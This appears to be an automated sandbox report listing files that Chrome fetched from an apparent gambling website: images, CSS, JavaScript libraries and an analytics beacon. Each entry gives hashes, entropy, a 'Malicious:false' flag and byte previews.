                                                      SSDEEP:1536:FS7jS41Drs+79To6ny5I+iPyBgm4MJS1RAoTmNb1I3G+Zl91/x1rk7BQ:FQY+No2ym+iDNMQ1qF1I3Gyxhk7BQ
                                                      MD5:0DEE9145EC3DB7273D5A223D992AFAB3
                                                      SHA1:C5FE8EA6BB7E65C961960E48B3A97B368C2E22E2
                                                      SHA-256:3A870703A8ED92857FE3201E70EBED8AB458A8B45AE71D6F4B180D5432DFE7E0
                                                      SHA-512:939B8DDFBCE68646F337F9456B3C129119C290B535A8BAD56CA493D0C92FBD2B9DF5F75CA4A8263C36BFA183DF05C03A0B8E8BB73D42D7A61D208B4358C3B751
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/cms/cms_1143.png?ver=1708958748
                                                      Preview:.PNG........IHDR................-....PLTE..........................o...............................................@..h..................Z................ "......0........ .....M..............n..i..............kkk.....N.........pA.H.....]........|..."v..Q................[..q..f.......K..........:@..{..F.....e..h..S..0w....X...._MLM%.... ....F....r.n..................}....B........... ..8.R.<.`...'%%...........n..........*/......z....wv.....p..............nP.....E4..'.{{.++...a....`...C!..>.....sw..y.W....<....S.q.h....[.....>...=}}}.B...........j.)..kI.[.............<...........@.d`.a..}R.Q........!....z..TQ.Zdi..^._.>SN.%.#;F......_..k..@9..V...1.......Z....v.S'....>..{..+.G;\ov@R...n.u.x...3i.......{..r.K.....v{.T[.{ ....5.R........V......I..9...,...+IDATx....0..)p[..._e...x.>.]......;...j..& $...cr.>..F..r>o..BN1...tA..U.:.-.Wf..%f.g.f6....|............g....F2..B.Y.dY2_.I.1+f......9u9.lb......q8?...%.T...k..mP..5..5
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JSON data
                                                      Category:downloaded
                                                      Size (bytes):40
                                                      Entropy (8bit):4.022573883611434
                                                      Encrypted:false
                                                      SSDEEP:3:VJWQoTkqF5wS:VYQoTb51
                                                      MD5:27A5688B27AE3688CA0183CE926BE3C8
                                                      SHA1:FA4DEC3B6AF6674AFD7B14710CAC41B15AE75B29
                                                      SHA-256:4359A477FC8CC8212517F5A190D4AA0A7CD1C85509D56D2A6A8EFEF408420AD7
                                                      SHA-512:D73BB567A0B0280D42DDA28C8E97725E96529072BD78D0844786E008D9CE3F89C7C3399EEA85342BE65D7B440D6023094B9F2F5D624E7DDE0A46FBFB1484BC85
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://b45032.com/member/call-request?check=1
                                                      Preview:[false,"\u529f\u80fd\u672a\u542f\u7528"]
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:Algol 68 source, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):127757
                                                      Entropy (8bit):4.9428194938159145
                                                      Encrypted:false
                                                      SSDEEP:1536:/cZlnfxbjbJzvdvpeG2iMuz/M6z4QZFSNwmJaxxKZ5dFR79LNOf0uK:/cZlntbEG2i8umYx620uK
                                                      MD5:E70EDB526FF09F426618EFADE93A4782
                                                      SHA1:840B05449D3851118FC835592BD98AF885BDBF1F
                                                      SHA-256:AB513AA4626BA224AC61B747674E6AEAD965F6E2CF87A2E60C7D4645B519817F
                                                      SHA-512:943192C03E09B13BBDEE324FDA4C81D019B4CB5178596B5C548A1E6776022ADED289A6076D32D5F55F99316B57B6F7DB13C6429EDB3A1E6927E7BCEA89774CD9
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview://! moment.js..//! version : 2.17.1..//! authors : Tim Wood, Iskren Chernev, Moment.js contributors..//! license : MIT..//! momentjs.com....;(function (global, factory) {.. typeof exports === 'object' && typeof module !== 'undefined' ? module.exports = factory() :.. typeof define === 'function' && define.amd ? define(factory) :.. global.moment = factory()..}(this, (function () { 'use strict';....var hookCallback;....function hooks () {.. return hookCallback.apply(null, arguments);..}....// This is done to register the method called with moment()..// without creating circular dependencies...function setHookCallback (callback) {.. hookCallback = callback;..}....function isArray(input) {.. return input instanceof Array || Object.prototype.toString.call(input) === '[object Array]';..}....function isObject(input) {.. // IE8 will treat undefined and null as object if it wasn't for.. // input != null.. return input != null && Object.prototype.toString.call(input) ==
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:ASCII text, with very long lines (16994), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):16994
                                                      Entropy (8bit):5.292328836656455
                                                      Encrypted:false
                                                      SSDEEP:384:Rigwo5UpVZG9lOUlgkhzj7FRNE82XyySyTYayWri/SRVRXFKP9nWZcT2Rc8ex51f:RiB8lOuR5wSWrrRVR1KP9WK6Rc8ex/
                                                      MD5:2F9966A615F3F46D846807ADBE42644F
                                                      SHA1:441544C084828DA55CA0BAFDC4C3DF7DC7020820
                                                      SHA-256:BE4D1215EF6F2B2915B7F65CD28B9A9F7DCEF17E1F0D883EDD19400CA0EA795C
                                                      SHA-512:E85F14552C1B5837780990E210223C5D6F532DD55F16589F682D1F2F95ACC540B715AAAC23CE12F871661006F80EC9043A9674DFDEC1C3EFC0819125D492DFF6
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:!function(e,t,n){"use strict";!function o(e,t,n){function a(s,l){if(!t[s]){if(!e[s]){var i="function"==typeof require&&require;if(!l&&i)return i(s,!0);if(r)return r(s,!0);var u=new Error("Cannot find module '"+s+"'");throw u.code="MODULE_NOT_FOUND",u}var c=t[s]={exports:{}};e[s][0].call(c.exports,function(t){var n=e[s][1][t];return a(n?n:t)},c,c.exports,o,e,t,n)}return t[s].exports}for(var r="function"==typeof require&&require,s=0;s<n.length;s++)a(n[s]);return a}({1:[function(o,a,r){function s(e){return e&&e.__esModule?e:{"default":e}}Object.defineProperty(r,"__esModule",{value:!0});var l,i,u,c,d=o("./modules/handle-dom"),f=o("./modules/utils"),p=o("./modules/handle-swal-dom"),m=o("./modules/handle-click"),v=o("./modules/handle-key"),y=s(v),b=o("./modules/default-params"),h=s(b),g=o("./modules/set-params"),w=s(g);r["default"]=u=c=function(){function o(e){var t=a;return t[e]===n?h["default"][e]:t[e]}var a=arguments[0];if((0,d.addClass)(t.body,"stop-scrolling"),(0,p.resetInput)(),a===n)r
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):23291
                                                      Entropy (8bit):7.985672750586015
                                                      Encrypted:false
                                                      SSDEEP:384:x602lNDu5+FKWzpzIGHzLQhdc7Xv8wKj6RXgi1d23xDWt8qlrBjMfWvSlZqyl:g02OELkGfQWf8Xj6RX71cBKNrBAKSJ
                                                      MD5:920439312EFDAB1EAC3DF830AC011A0F
                                                      SHA1:106D814396D8AF18DEA95F1B72AF7CB3B514FBD2
                                                      SHA-256:14C29A88D75A8951F8F69F9F5AF9F19D49058BF1BAC119E060034A5764D7A5ED
                                                      SHA-512:E4CEEDF1CA3FE619E583C215EED76E61B017EE4E2A08D31673EA61E02E6E9F868502AD2C7604FA36ADBA24C87A14A1FCCD8B7D7ED8FA419C7CF61BC05D426945
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/joker/zhh6mqf3z495a.png?ver=1734681327
                                                      Preview:.PNG........IHDR...............^.....PLTE_..............................x......^....rR............J..}Y.wU...gI~.....G..lK...b..................q..+..................v...........A.m.X?...w....|..............Y...te..i..p...|...K..........e.......kb..p..`?.....aL1..X..7......i(.mUT.....2..x.xdx...w*...@.......vy\.(>...S....]...........spSL...q!..1.0l 3.M=.V.........3......_,<.......C.:........u...w:2......(..J.y.3...>.$B..s..8v..X.m...~h.F....M/%...S$.....q&.^.....F.....C[.............(.&m/....................j`{....6l......H.....ME..T.>..........\@/x7.....[.........4.5A..s.....".Jc........3....lYO...Z.D1y;.j..G2.f.rE;..................8..;......T....1M.Y.........k.b.a..j.>.o.....{.....ii.8.......s..S...../..wx.v....].s..3...N.....tRNS...(...W.IDATx...y<......]..B.B..L....m.....".KcJ..d.-...C..P....e...C..n.f..S..g~...u].......{.>..88x..s{.^.A.........?1.=o..m?em]Sc=..6.z [o..}.a.p.>...Q.F}...A7.go..t
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:GIF image data, version 89a, 1 x 1
                                                      Category:downloaded
                                                      Size (bytes):43
                                                      Entropy (8bit):3.0950611313667666
                                                      Encrypted:false
                                                      SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                      MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                      SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                      SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                      SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://hm.baidu.com/hm.gif?hca=E4D1CF12C6FA10DD&cc=1&ck=1&cl=24-bit&ds=1280x1024&vl=907&et=0&ja=0&ln=en-us&lo=0&lt=1736725677&rnd=1610693818&si=947ea0365dd8ab01fc51bd9439b42930&v=1.3.2&lv=2&sn=48231&r=0&ww=1280&u=https%3A%2F%2Fb45032.com%2Fegame%2F202&tt=bet365%E8%8B%B1%E5%9B%BD%E4%B8%8A%E5%B8%82%E5%AE%98%E7%BD%91
                                                      Preview:GIF89a.............!.......,...........L..;
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):28572
                                                      Entropy (8bit):7.990856806047853
                                                      Encrypted:true
                                                      SSDEEP:768:pl61Y1HgGJIfhcrVJ2OvtxKNDL9lq7ZE4e8uGVZotuFlzqyW:361+IhcrmOV+vq7i4B9fnBW
                                                      MD5:CDC69EF23D92D5E3D428039E69561519
                                                      SHA1:C702690C4810DAA7918CDC6B6CA3395460715F18
                                                      SHA-256:0F88D3E2ED08038F095B6A930F3B679705D01E0F6845C7B71ED86AEACE6BDBE2
                                                      SHA-512:1E45C5DBE8E0F9FCBD1B97CE9AC87A4608DEF27C3B228D1C95D976402CCF8891B7056A61D1448CE853B25FC34550BF5D4E7D07C05316B8B125ED72386A8800D1
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....PLTE.... _... "c..[..V..M....[.#""..9.........!$m.......U.577.D....(),?@A1/.."S.`.HIIQRR."F..-.N..-i.;..&aY\].....I..?.....".)3eef.....@,,e.f..C..}......6.M.mpr.4s..F.6..o.y{y...........S.x...d..+...+............)x....3@.....=\.-P3...........+Sn* s..r./.>{.|../-..".......#...=>.u..yf.m.......K.............%&P..........JH....[....3..f....C...6^.m._.....P.....C.&.............0..9.!..w.08W.......E?..<.Z.....H......1....s.../3s..U.N...V.`....}L-........QR.k;..}.........\.X.;Gl.g..[O.h6,.....(+.....h...e...]K.f@?R=..VL.",.i_.9..!..{,..6.X&."M........R..q.....M....jP..Q...da..;&....]6...op....$.F.te7.v.q........R.WO!...rUK..4>...Zx.<t.....JD....p9.....dv..\U.n[...66.T*Fc....k....{".dV..?c.cv....~...TzC \ah............h.OC.p.B..{.X..E..7Q.,..G..5j.5-.&..lWIDATx....XS......5.H.&Af...J... ......J.A."...Q9( j..@...X.RA..g.:Q..l.k...Vk.|.............!B.....7r%K..&'g-...e.25.)/l..C.....%ki......o......C...'+......!. .~..{......}&..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, from Unix, original size modulo 2^32 105
                                                      Category:downloaded
                                                      Size (bytes):92
                                                      Entropy (8bit):5.219996186644652
                                                      Encrypted:false
                                                      SSDEEP:3:FttLqqp2gJyDgI3RNsJZsfs0A3GlwLWnyCclIZll:XtLqS2UoNqsM3GUgynlIbl
                                                      MD5:5ABD2C0EB13EC7DA156B63E2BD37B8C5
                                                      SHA1:D71B83C1A1DE7ED13BC7CA152662F4C0F5A0E323
                                                      SHA-256:2E324A625E144EDB9873E0362C1ABF4A0542C2EC36B06F5BEF902A4D078D74BA
                                                      SHA-512:6ECD39D77AA51793114A5EA4FD0518334965C7A27D4CD629509CA80EB37FB779DC90481F4A21BA9288D97D20547EF316CACCDA7843FB843CAF75BDBEB8198F49
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plus/css/custom/login_custom.css?ver=1663905027
                                                      Preview:.............O.....OI..M.O.T.K/./-..ILJ...L.,..I..R...K......../..,I.O../I-B.g.U...[T.i...
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):22138
                                                      Entropy (8bit):7.979874351501081
                                                      Encrypted:false
                                                      SSDEEP:384:Fmnha7sML/Zkdyll9Mnl4j3EuFkTIL6tbkVN+56aG3EuO8oaFUc9LJIvrW:FmhzMTZSyll9M0F2tQVNP1O8oKH6vi
                                                      MD5:E2099E972BACE8E277097C33120AF557
                                                      SHA1:594C8F2D43DDD71A486C032A7C1E40184A0080BC
                                                      SHA-256:B6B6BA467E8FF2C79FA85DA2985ED796DC33856F83FADA96C3639B2D4DA34E6F
                                                      SHA-512:8F3C6DDB8B2C88B6B057A08223020647C4304791C03CFF629EE298999CE4DEE98FA257066264C3E98754EB7CB5CDBE52865CC559A2FCF83E2B76925C699E43B4
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/joker/soojfuqnaxycn.png?ver=1673334591
                                                      Preview:.PNG........IHDR...............^.....PLTE&.6.....A..L........G...".U.....M.....X.....:b....2.....W..Z+.ch....@.....w...7.k...3..N............[.z.e...K../.8;q....2..[...9.c.....#....|....}..."j........[./.qC.r..D....!a....)......M.l...pB..ru....W..8...<...........eiZ9...#........0.....4.M.......T.....g.../.8.q.e.. ......?.... ...P...;....3$..W\...\&....x..k0..U..+z..v......kR.. ..(M.1$.i...../.m....l#....HS.EM..=5+7.....b.;]5P:.<....Ps..E.H8.........,...b+...@...(..x..=.O(-oG).F..D....4../....Sq.w..Y..W..`.9x0.G.. "...E)...?......WC@...B.H.......e....;.3...2....DB..G....5eg..<....-...P.........~._^..A..."..D.D7...-.KU..}1...|]...w..jNmSbh...}|e:.Q..w..?J....dk.h.)"....d.....Z..nsG..GBv.T.A#.l%..m..z9.u...O.^....._.^.`E.K..E......qY`..b...$n....X..i.5v.>u.S.........S....v+..R.....S5IDATx.l.n.A..`g....F#.2.c-XUK.\.e!F.}...J.......j..Au!.&...b.*R..3..%.......(..&...K..kc..DL_%.m_.)._....I...R.`.X..^.m.......A.....m=..,..M..S.I?....Z.a.3.......K0-.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):29911
                                                      Entropy (8bit):7.98911784312599
                                                      Encrypted:false
                                                      SSDEEP:768:qjh1/9UVEXC91cBGXII0/hHnQu/pa46x89a:YFqSqsGxw9La4ds
                                                      MD5:C1F9ED239A664DFE6446A634CDDAD0B0
                                                      SHA1:A1048F449E60F18FDA33B43B8875A20DC67C06A1
                                                      SHA-256:D0732501DAC0FD7F7770D2F668C386CBB4DABD4498E3F632FF3C5DE4E0E19798
                                                      SHA-512:3A03B0EE7F1B649D8A57CE332C58658A7319B71EBB0E07248C9A9B5DDFDD4B04C63E3B1D992077FA011A090531986F8EFC56D1CB3D453E953A9DE34C6E5E023D
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/joker/fmjyoi4wkifrs.png?ver=1727844915
                                                      Preview:.PNG........IHDR...............^.....PLTE...2.9...&.....-..:..?8A......Zj....72:.."M..-..#.('........Y".*&....0 %&..QHV/,6.V...*#....#3..F>M ..*.... ,.3...%.+...6.;kfyg$.[Se......<,0`^p...#..9$+....aQ...uo...[..XJ......T=;j6/......K40iYo...|D5..o......bE=r+.=/g^;g.A.!...tRD..........yL,U...JK..8..w..S}.......z.9..w.|z..N9*:B....k`..ASc6EX.....OX.@+G.,%........t.).D?r........:!R.f...........W...i6.....a;+....~nt...!`...UC.W..s..y|....yd9..KRd.zb..6o...vDmHx..qO........0$.L.....Fm.....J.[TJ.k......>....\*.xf...kKK.b...j..R_k~O4..Q*r@.L'6...y:...D......]......{g..^....iV..frg^....n=....z..OT...l.D..$*J.......4[....f..X.x........D....".^!5d...U.29k^L..at..: .b..;2.r......j.Xer........g..Z..q..M.....&......C@...G...o..r%o1TG.M.N...%r.kE..Z...F0.Z5..48~O._.t[pA..L..&.{d...;X.....q.IDATx....\S...}H... .1&E...B..E....."j..Q@....2..$(2(.Q.B.."..h..Uq.U...y.v......uNP....yvB.!...5....o}...1.....xk..:....=.....'.....7q"..'....paV.]....t1sq.4~..YA..M....1
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit/color RGBA, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):88643
                                                      Entropy (8bit):7.993220539137035
                                                      Encrypted:true
                                                      SSDEEP:1536:akqj9uG9V2V9eq/FsP7jeJ7id46N/+Jkm6DT8Nw1ygskiq3UKUYiixssMxk53M:FY95VLAk7jeJbRGjEq1UYDOXxku
                                                      MD5:2FC41EB4578273BEA1EB58C7F8E06AF5
                                                      SHA1:B2B0B3E2EC38C77EBE08646A4CA2150E84DBE9BE
                                                      SHA-256:D14C62C3C8BDCF1E1E0F9F8C98487B62E3C39051700ED52C1FAC7675836591B1
                                                      SHA-512:AD3A937341177134BF2B1F7CA0E8C8B9264C311EE0AE063332D846205F3C29587090F40326C121411F834E062F561366F4FEA788A45344A2A146F874BB6F7A3E
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/common/storage/game/egame/upg/UPG_treasureSkyland.png?ver=1712128601
                                                      Preview:.PNG........IHDR..............X.....lzTXtRaw profile type iptc..x.....qV((.O..I.R...3.c..#.K.... ..##.d.#CK ......,.,.!bd`.bfnn.,.enjn`f..........+.G..".....iTXtXML:com.adobe.xmp.....<?xpacket begin='.' id='W5M0MpCehiHzreSzNTczkc9d'?>.<x:xmpmeta xmlns:x='adobe:ns:meta/' x:xmptk='Image::ExifTool 11.70'>.<rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>.. <rdf:Description rdf:about=''. xmlns:dc='http://purl.org/dc/elements/1.1/'>. <dc:subject>. <rdf:Bag>. <rdf:li>Icon</rdf:li>. <rdf:li> mgp</rdf:li>. <rdf:li> upg</rdf:li>. </rdf:Bag>. </dc:subject>. </rdf:Description>.</rdf:RDF>.</x:xmpmeta>.<?xpacket end='r'?>.3.X.. .IDATx.....%W}..=..n~....-.[....H ...Lp.66...^.0.w.....N.3......a`..cL...&I...Z...tS.[u.~N..Z-.z..O..........G.6^.A.~.........A..).....d.0.......".o)......}.....-4h......_.....V...;.Z...../K)..._.a_s.4..t.o^..g.k/C..B.R(s.......!.....E.p#..rq.{..C.|.1..S>...>.4}..e..D)w.f.Z#. ...]B..)........I.'..%....D"..5M.1-C.....'U.J.#...sE.].
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):2042
                                                      Entropy (8bit):7.541765832445623
                                                      Encrypted:false
                                                      SSDEEP:48:BajU5YgLmplDgFMoiIMW65Jv0ij+TIENQj7jw0a:BajsYP7dLBFj+UsQjNa
                                                      MD5:3724A730026D3E73D6A13896A90B37E6
                                                      SHA1:4F8170551FF51B5BEEECA7DBD1309B1FCA71FEFD
                                                      SHA-256:74FAD5B82F5C1B73DBB7E1E50E9631470D9757C5BE8D436D8576757A3D59EAC1
                                                      SHA-512:174EF0FA9975294C1FA32749BD18C940F674886C7C1581ACE32DC91DC9216572E30A5833F9EF08A63F00CD7A17F311E9F0F3B90FD228D98395F4E49F0DECC8B5
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR..............P......PLTE...^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^*x7....*tRNS...@pP.0....!..m.X7....`.......xE,'.L.g...K./.....IDATx....N.@... ..([,.."U.....1$..n.U1^...d..&c........................................V.G....}jZ......LI...6d.Yg.<..fd.;.>7Ni.2.o(.N.,z..L._.c.'k.%2..Q*.m.Y..J..g;q.^.0>.D....".h]].E....m(....h....]....E|.V..Z..0^U..F.......Ws.:.VG...y..rH....W_.S..i..../.T..Qa.."6.....V..;Ra.J........$.2"L.....0.|a^%."".$*.....=..f.{>7v.'..L.0...........l....q.....&....xOV.L<....e.[v..x...Vv4.a.q..V.{.fa~B.......N...8~.)Nb..0.|......p.N..............$.J.L.U.F.CO.K;..:...0.."....O.v.a`G.C..W|....C]...?T.b......].o.>..L.....&A..:..:.>L.G_....j...jT2...W7...a ....n..`....F....T..A.ia....`~!.g.T.....].9#.3...a?..a._.&Ru..S..{...i.7b.....i.1...,.N. ..f.......lU#..S..5?...........H.|*....B?....w....<h.I..O6..P.d...Cl.....L0t.....~..L`.N.%....)T.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 200 x 200, 8-bit colormap, non-interlaced
                                                      Category:dropped
                                                      Size (bytes):29911
                                                      Entropy (8bit):7.98911784312599
                                                      Encrypted:false
                                                      SSDEEP:768:qjh1/9UVEXC91cBGXII0/hHnQu/pa46x89a:YFqSqsGxw9La4ds
                                                      MD5:C1F9ED239A664DFE6446A634CDDAD0B0
                                                      SHA1:A1048F449E60F18FDA33B43B8875A20DC67C06A1
                                                      SHA-256:D0732501DAC0FD7F7770D2F668C386CBB4DABD4498E3F632FF3C5DE4E0E19798
                                                      SHA-512:3A03B0EE7F1B649D8A57CE332C58658A7319B71EBB0E07248C9A9B5DDFDD4B04C63E3B1D992077FA011A090531986F8EFC56D1CB3D453E953A9DE34C6E5E023D
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:.PNG........IHDR...............^.....PLTE...2.9...&.....-..:..?8A......Zj....72:.."M..-..#.('........Y".*&....0 %&..QHV/,6.V...*#....#3..F>M ..*.... ,.3...%.+...6.;kfyg$.[Se......<,0`^p...#..9$+....aQ...uo...[..XJ......T=;j6/......K40iYo...|D5..o......bE=r+.=/g^;g.A.!...tRD..........yL,U...JK..8..w..S}.......z.9..w.|z..N9*:B....k`..ASc6EX.....OX.@+G.,%........t.).D?r........:!R.f...........W...i6.....a;+....~nt...!`...UC.W..s..y|....yd9..KRd.zb..6o...vDmHx..qO........0$.L.....Fm.....J.[TJ.k......>....\*.xf...kKK.b...j..R_k~O4..Q*r@.L'6...y:...D......]......{g..^....iV..frg^....n=....z..OT...l.D..$*J.......4[....f..X.x........D....".^!5d...U.29k^L..at..: .b..;2.r......j.Xer........g..Z..q..M.....&......C@...G...o..r%o1TG.M.N...%r.kE..Z...F0.Z5..48~O._.t[pA..L..&.{d...;X.....q.IDATx....\S...}H... .1&E...B..E....."j..Q@....2..$(2(.Q.B.."..h..Uq.U...y.v......uNP....yvB.!...5....o}...1.....xk..:....=.....'.....7q"..'....paV.]....t1sq.4~..YA..M....1
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:gzip compressed data, from Unix, original size modulo 2^32 29063
                                                      Category:downloaded
                                                      Size (bytes):7494
                                                      Entropy (8bit):7.9704951061074745
                                                      Encrypted:false
                                                      SSDEEP:192:TH6PPhIx6wcj5um+sRPqg/c54pz94qglIjH2XAI2d:j4S90V+6/A4/giCu
                                                      MD5:F260AC6BC60FCD25B835325EE3DFE916
                                                      SHA1:EDB1C57AACEFD1ED09E4B37FA8076BDBA890B153
                                                      SHA-256:7DC8AC6C9CF668AEB1EE832EA9BB243BF09303622D14DB4F29DD779CE9D0EECD
                                                      SHA-512:0FCBE9814D02B1A4635CF58A321DBBA18F36776C2E55DF06366BDC2CE3720066B4070209E6570B1417D16BEB8662BA05E841D9E6A8BE3B51A17636CE0FDBD2B5
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/plus/plugin/css/font-awesome.min.css?ver=1606790105
                                                      Preview:...........]M..Hr..(.`-i!....-.=k...0..v.>..$.UT.H..]]....2..EJ..10./.X5....../.~..?.a...M=l.r.}s.......Mz......3u~.D..0.O?.T@.L.We..?/...~-3[.6..O..u.>m........*~......i._..a!.P.O...0......euzz.g..|..i.o..|..eK..M.W.......o.......E.......fx...R..6......o...ql."97d..?..%...M..C.|>t...._vR.np......to... ..O.....T...G.p.,.|.*.......*k..U.={Q.m.........#.``..g.2..+...}....9..wOf......%..0...f..w.P..4..?D..s......:s.3SY...}..p5.W...=|...O}.......%..P.~...?.2..E..=.....|x.|x......^....|.M...}|.<..~(..N..y...<..D.-....ve=..\.c_..T..r..9.`V.i..._..K...P6.Sg+3./......M5....)Z.>5x.hh.e.z...S1.._M=~..`.M..N>]a.7W..js.....?.ee...>...Z>.:..c.v..v.*?6_..1.......9....{..w.....>]qrg.....L"....su~.W.(.....-./.RL]B..M.o.(.r...v.}.-B2R..Pv.(..l.}x....}.Y..lOEg...Hg.....:S.N.?u.`..v.............|........6.9z.~..}T..t...m.....?.......]....o....L_f..[_........>.n...au.....{.........RCQ..C.............KmE..........EU......xW.....7......o2.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 271x81, components 3
                                                      Category:dropped
                                                      Size (bytes):10687
                                                      Entropy (8bit):7.941103878605605
                                                      Encrypted:false
                                                      SSDEEP:192:/82vfqsMWCRvaAD3/mt5AocLT+nTOFlJH6IPsSmIYl:/823dMWYr4KocL6kPsSPM
                                                      MD5:EC1232FA10FAA81CDC043FDE398FE8C5
                                                      SHA1:6C777C1653D117802F67B501DAFA08CB8DC03609
                                                      SHA-256:B17264CCD66167D7844F3EEF951F98A95088F867E059EE80AED79AC64104C18B
                                                      SHA-512:A9FECBB6BF5FE0CE811295B0A25F5C87CD7376A742AC3157EF6CF33AD4E96D87B01B7B8D846E7BCC352379873E373143E325EDF847AD4EC422701F8EEB261268
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:......JFIF.............C........................................................ "..".......C.......................................................................Q......................................................................................?.a...P......I.$v@.....:...hx.a.KI2..,I....l......P2......[....)Y..#....m.U.....~...ek.6..&wz...6..h...5&R9Tx.$....&...Y......B.:$jW.h...d_g.~H..J.!.)...}..5."./.{.~...........*77....T..z...F.....!.Re@r%,...4.A...n.G...7.~o'....{,....|.=.W.........z.:_.}.^..s....]....UFg....Es..k.%.>%A.?.w....w.Gi..T0[.:.......b..~.7..K<.M58...F...K].x..a..#.z[..HO...J..)...E..".a.{N...5..w.fM.n..j....]...-.v.zf..l...:)gQx.....w..l......a..XrT.al....9.e....a.a.=...R.6....-E..\W.t.HO..'d..3..*....W........'...9...kHYk..0.HEz..H..C.eX.>.{O.....y.lp..u.5{)....;..+....7.7T.yK.;{.[,...[e'D.V.Fpb.<.Y.X..D.CW.G.U...i....7....;.....e.4h}.D..wy.k.*..J.......}>nc;..[$.r...qJ.<C$m.Y...$.Kb!1...:..0..YPU..`...28....=.....%..5F..f...<)U...R....2..
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 700x255, components 3
                                                      Category:downloaded
                                                      Size (bytes):38207
                                                      Entropy (8bit):7.968365258904347
                                                      Encrypted:false
                                                      SSDEEP:768:7+ul8A+fp932heND/+nO+cpDsPYw5ZBYL6hbxesrnnZmMQQenXqz:D+DYeB/+nLEDKYYjYXuNQtnXqz
                                                      MD5:FDFB0E81AABCA7084B51C58D99C753F0
                                                      SHA1:80231A361051FAB3A305981BE0ADFCCD5D7FE402
                                                      SHA-256:B857AA870A145F1FF24E57697EF665EEF653CD6AA87A56FAE86FB791306817C4
                                                      SHA-512:1053724CC71BBCE98838B4DACA79EADAD3FB08AB6AE62F210397AF1BC0F3C4B614F9FCF0ADA50B39297ABB21DA96D40DC0593FB18C731EA396ADAAE7F7358E4B
                                                      Malicious:false
                                                      Reputation:low
                                                      URL:https://5getfab.segrft.com/images_plus/other/banner7.jpg?ver=1606891701
                                                      Preview:......JFIF.............C....................................................................C..............................................................................................................................................................................................................v..t..............................[8.xt.[19...S5$.4.yXi1.)a..............................g..NtF.2.e....]K.M.<.7......h..............................rOA..w..3..3...V2y.9p...K...1.@..........................3..?....-.q......_&.a...dq...K[.............................t.....v....X...o.z......_(..9....|..VVN......................................-....v...{I..m.7Wc..7Q...z.(.^......L.....7.K;[..............................:.g......=....].d............#.39StN...:n\.Q..<..............................x./Uo...j.[.G(..]|.x....?V.q.o.-....Ziv.^.I. ....$...D..&|..}..........S$D.......k.n..,./......q6>d.s=...b].Q.L.:...Vt..Z......7.....S....x;...p.T&....6..=..>.....K..Di..Q.Ug.....?P.|.
                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      File Type:PNG image data, 280 x 280, 8-bit colormap, non-interlaced
                                                      Category:downloaded
                                                      Size (bytes):2587
